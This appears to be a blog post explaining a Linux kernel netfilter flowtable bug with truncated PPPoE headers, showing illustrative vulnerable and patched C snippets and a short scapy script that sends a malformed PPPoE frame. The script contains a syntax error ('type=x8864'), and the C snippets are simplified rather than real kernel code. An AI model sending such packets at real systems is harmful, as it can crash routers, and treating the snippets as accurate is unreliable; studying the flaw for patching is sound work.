CVE-2024-27016 - Critical Linux Kernel PPPoE Netfilter Vulnerability Explained

On February 22nd, 2024, the Linux kernel team patched a significant vulnerability affecting the Netfilter subsystem—specifically, the flowtable feature's handling of PPPoE (Point-to-Point Protocol over Ethernet) headers. This issue has been assigned CVE-2024-27016. This post explains the problem in clear terms, demonstrates what was fixed, and explores how someone might have exploited this bug before the patch.

What is Netfilter and Flowtable?

Netfilter is a critical framework in the Linux kernel. It allows for the filtering and manipulation of network packets, enabling network address translation (NAT), firewalling, and more.

The flowtable feature provides accelerated forwarding for certain types of network flows, mainly to improve performance.

The Root of CVE-2024-27016

Flowtable code had a logic bug when working with PPPoE headers. PPPoE is often used by networks to encapsulate PPP frames inside Ethernet frames.

The vulnerable code did not check that there was enough data in a network packet before trying to access the PPPoE protocol field. If a specially crafted, truncated PPPoE packet reached this point, reading past the buffer could corrupt memory, likely leading to a kernel panic or even code execution.

Old (Vulnerable) Way

struct pppoe_hdr *ph;

ph = (struct pppoe_hdr *)(eth + 1);
if (ph->tag == SOME_VALUE)  // Accessed without checking buffer size!
    ...

The Fix for CVE-2024-27016

The Linux kernel team introduced checks to verify that a full PPPoE header exists before touching the protocol field. Additionally, they refactored the code to use a helper function, increasing safety.

Patched (Safe) Way

// Example of checking the minimal PPPoE header size
if (skb->len < header_offset + sizeof(struct pppoe_hdr)) {
    // Don't process this packet, it's too short
    return NF_DROP;
}

// Access protocol field safely with a helper
__be16 proto = pppoe_hdr_protocol(skb);
if (proto == EXPECTED_PROTOCOL)
    ...

Crafting an Exploit

DISCLAIMER: All exploit details below are for educational purposes only. Never attack systems without authorization.

How an Attacker Could Exploit CVE-2024-27016

1. Craft a Minimal Packet: Build an Ethernet frame tagged as PPPoE but with less than the size of a full PPPoE header (just 6-8 bytes, or even less).
2. Trigger Flowtable Processing: The attacker must ensure this packet is processed by a kernel with Netfilter flowtable enabled (default on some Linux firewall/routers).

Example Payload (Python, scapy)

from scapy.all import Ether, sendp

# Forge a broken PPPoE packet
eth = Ether(src='aa:bb:cc:dd:ee:ff', dst='11:22:33:44:55:66', type=x8864)  # x8864 is PPPoE session
broken_pppoe = b'\x11\x22'  # Insufficient header

packet = eth / broken_pppoe
sendp(packet, iface='eth')

Who is Affected?

- All Linux distributions with kernel versions before the patch (mainline 6.7.7), if using netfilter flowtables and exposed to untrusted PPPoE packets.

Update your kernel! All major distributions are shipping patches.

- Upstream kernel patch
- Debian security tracker entry
- Red Hat advisory

Conclusion

CVE-2024-27016 exemplifies how even tiny oversights in packet boundary checks can threaten the stability and security of core system components like the Linux kernel. If you manage Linux-based network equipment, your best defense is regular kernel updates and attention to security advisories.

References & Further Reading

- Official Patch Commit
- CVE entry on NVD
- Netfilter Project
- PPP over Ethernet (PPPoE) RFC 2516

Timeline

Published on: 05/01/2024 06:15:20 UTC
Last modified on: 08/02/2024 00:21:05 UTC